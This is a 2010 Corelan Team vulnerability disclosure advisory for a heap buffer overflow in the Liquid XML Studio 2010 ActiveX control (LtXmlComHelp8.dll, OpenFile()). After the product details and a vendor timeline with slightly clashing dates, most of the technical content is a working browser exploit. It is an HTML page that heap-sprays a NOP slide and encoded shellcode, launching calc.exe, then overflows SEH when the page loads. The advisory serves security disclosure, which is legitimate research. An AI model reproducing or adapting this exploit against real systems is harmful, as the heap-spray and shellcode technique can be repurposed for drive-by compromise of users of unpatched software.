|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------|

Advisory        : CORELAN-10-012
Disclosure date : 15/3/2010


0x00 : Vulnerability information
--------------------------------

[*] Product : Liquid XML Studio 2010
[*] Version : <= v8.061970
[*] Vendor : http://www.liquid-technologies.com/
[*] URL : http://www.liquid-technologies.com/Download.aspx
[*] Platform : Windows XP (IE 6 & 7)
[*] Type of vulnerability : Heap buffer overflow
[*] Risk rating : High
[*] Issue fixed in version : v8.10
[*] Vulnerability discovered by : mr_me
[*] Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/


0x01 : Vendor description of software
-------------------------------------
Liquid XML Studio 2010 is an advanced XML developers toolkit and IDE, containing all the tools needed for designing 
and developing XML Schema and applications. In use by thousands of users around the globe and forming a key 
foundation in the XML activities of hundreds of Fortune 100 and FTSE 100 companies, Liquid XML Studio is an essential 
item in any XML developer's toolkit.


0x02 : Vulnerability details
----------------------------
By loading the activeX control (GUID: E68E401C-7DB0-4F3A-88E1-159882468A79) OpenFile() in the module LtXmlComHelp8.dll an 
attacker can pass an overly long string value and overwrite SEH, thus, hijacking the flow of execution.   



0x03 : Vendor communication
---------------------------
[*] 6th Feb, 2010 : Vendor contacted regarding vulnerability
[*] 7th Feb, 2010 : Vendor responded stating they have identified the vulnerability and will fix in v8.10.
[*] 14th Feb, 2010 : Vendor fixed the issue in v8.10.
[*] 15th Feb, 2010 : Public Disclosure.


0x04 : Exploit/PoC
------------------
Note : you are not allowed to edit/modify this code.  
If you do, Corelan cannot be held responsible for any damages this may cause.

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='boom' ></object>
<script language="JavaScript" defer>  

	// calc.exe
  var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +  
                       "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +  
                       "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +  
                       "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +  
                       "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +  
                       "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +  
                       "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +  
                       "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +  
                       "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +  
                       "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +  
                       "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +  
                       "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +  
                       "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +  
                       "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +  
                       "%u652E%u6578%u9000");  
  var sSlide = unescape("%u9090%u9090");  
  var heapSA = 0x0c0c0c0c;  
  function tryMe()  
   {  
    var buffSize = 10000;  
    var x =  unescape("%0a%0a%0a%0a");  
    while (x.length<buffSize) x += x;  
    x = x.substring(0,buffSize);  
    boom.OpenFile(x, 1);  
  }  
  function getsSlide(sSlide, sSlideSize)  
   {  
    while (sSlide.length*2<sSlideSize)  
     {  
      sSlide += sSlide;  
     }  
    sSlide = sSlide.substring(0,sSlideSize/2);  
    return (sSlide);  
  }  
  var heapBS = 0x400000;  
  var sizeHDM = 0x5;  
  var PLSize = (sCode.length * 2);  
  var sSlideSize = heapBS - (PLSize + sizeHDM);  
  var heapBlocks = (heapSA+heapBS)/heapBS;  
  var memory = new Array();  
  sSlide = getsSlide(sSlide,sSlideSize);  
  for (i=0;i<heapBlocks;i++)  
   {  
    memory[i] = sSlide +  sCode;  
   }  
</script>  
<body onload="JavaScript: return tryMe();">    
<p><center>~ mr_me presents ~</p>
<p><b>Liquid XML Studio 2010 v8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Heap Overflow Exploit</b></center></p> 
</body>
</html>